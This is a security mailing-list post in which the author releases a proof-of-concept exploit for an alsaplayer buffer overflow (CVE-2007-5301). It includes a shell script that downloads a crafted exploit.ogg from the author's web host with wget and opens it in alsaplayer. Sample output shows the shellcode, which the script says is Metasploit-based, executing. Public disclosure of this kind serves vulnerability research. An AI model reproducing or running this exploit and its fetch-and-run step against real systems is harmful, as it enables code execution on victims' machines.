Hello, I have released this PoC for the alsaplayer bug CVE-2007-5301. You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ #!/bin/sh # # http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh # # Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package # alsaplayer-common at version 0.99.76-9 # # CVE-2007-5301 / DSA-1538 # # by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net # 2008-04-09 # # Shellcode is based on metasploit framework. If you want to test it in other # systems, maybe you have to recalculate offsets. # # Example: # # whats@debian:~$ ./CVE-2007-5301-exploit.sh # Alsaplayer buffer overflow < 0.99.80-rc3 # by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net # # # --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg # => `exploit.ogg' # Resolving www.wekk.net... 64.22.71.90 # Connecting to www.wekk.net|64.22.71.90|:80... connected. # HTTP request sent, awaiting response... 200 OK # Length: 5,421 (5.3K) [application/ogg] # # 100%[===============================================================================>] 5,421 # 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421] # uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats) # echo -e "Alsaplayer buffer overflow < 0.99.80-rc3" echo -e "by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"; wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg alsaplayer exploit.ogg -- Albert Sellarès GPG id: 0x13053FFE http://www.wekk.net whats_up@xxxxxxxxxx Membre de Catux.org http://catux.org Linux User: 324456 Catalunya
Attachment:
signature.asc
Description: =?ISO-8859-1?Q?Aix=F2?= =?ISO-8859-1?Q?_=E9s?= una part d'un missatge, signada digitalment